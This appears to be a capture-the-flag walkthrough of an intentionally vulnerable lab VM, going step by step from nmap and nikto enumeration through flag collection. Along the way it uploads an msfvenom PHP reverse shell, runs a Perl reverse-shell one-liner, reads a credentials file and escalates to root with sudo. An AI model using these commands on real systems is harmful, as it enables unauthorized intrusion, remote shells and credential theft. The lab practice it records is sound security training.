[*]
1. Find host: nmap -sn 172.16.16.0/24
MAC Address: 08:00:27:D9:9A:9C (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.16.16.37
Host is up (0.00012s latency).
MAC Address: 08:00:27:3A:27:38 (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.16.16.4
Host is up.
Nmap done: 256 IP
[*]
2. Scan host: nmap 172.16.16.37
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
[*]
3. Port enumeration: nmap 172.16.16.37 -A -p 22,80
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 02:29 CST
Nmap scan report for 172.16.16.37
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| / /backup /admin /admin_area /r00t /uploads 
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:3A:27:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 172.16.16.37
[*]
4. Check first flag: http://172.16.16.37/flag
The 1st flag is : {8734509128730458630012095}
[*]
5. Found second flag:  http://172.16.16.37/admin_area
<!--	username : admin
	password : 3v1l_H@ck3r
	The 2nd flag is : {7412574125871236547895214}
-->
[*]
6. Web enumeration: nikto -h 172.16.16.37 && dirb http://172.16.16.37/ -a linux
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin_area/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/uploaded_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 8 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.

==> DIRECTORY: http://172.16.16.37/admin_area/                                                                                           
==> DIRECTORY: http://172.16.16.37/assets/                                                                                               
==> DIRECTORY: http://172.16.16.37/css/                                                                                                  
==> DIRECTORY: http://172.16.16.37/flag/                                                                                                 
+ http://172.16.16.37/index.php (CODE:302|SIZE:1228)                                                                                     
==> DIRECTORY: http://172.16.16.37/js/                                                                                                   
+ http://172.16.16.37/robots.txt (CODE:200|SIZE:160)                                                                                     
+ http://172.16.16.37/server-status (CODE:403|SIZE:300)                                                                                  
                                                                                                                                         
---- Entering directory: http://172.16.16.37/admin_area/ ----
+ http://172.16.16.37/admin_area/index.php (CODE:200|SIZE:224)   
[*]
7.  Login page found: http://172.16.16.37/login.php
[*]
8. File upload found after login. Upload shell
 msfvenom -p php/reverse_php LHOST=172.16.16.4 LPORT=123 -f raw -o shell.php
 kickoff shell: http://172.16.16.37/uploaded_files/shell.php
[*]
9. Found new flag: in ../hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}
[*]
10. Move shell:
perl -e 'use Socket;$i="172.16.16.4";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
[*]
11. Found nothing of interest in the users directory. look for his other files:
find / -user technawi -exec file {} + 2> /dev/null | grep 'ASCII'
/etc/mysql/conf.d/credentials.txt:        ASCII text
/home/technawi/.profile:                  ASCII text
/home/technawi/.bashrc:                   ASCII text
/home/technawi/.bash_logout:              ASCII text
[*]
12. Found user creds: cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor
[*]
13. Login as user: ssh 172.16.16.37
[*]
14. Enumerate user: sudo -l
Matching Defaults entries for technawi on Jordaninfosec-CTF01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User technawi may run the following commands on Jordaninfosec-CTF01:
    (ALL : ALL) ALL
technawi@Jordaninfosec
[*]
15. Get past flag @ cat /var/www/html/flag.txt
The 5th flag is : {5473215946785213456975249}

Good job :)

You find 5 flags and got their points and finish the first scenario....
[*]
16. No flag as root :(
sudo su -
root@Jordaninfosec-CTF01:~# ls
[*]
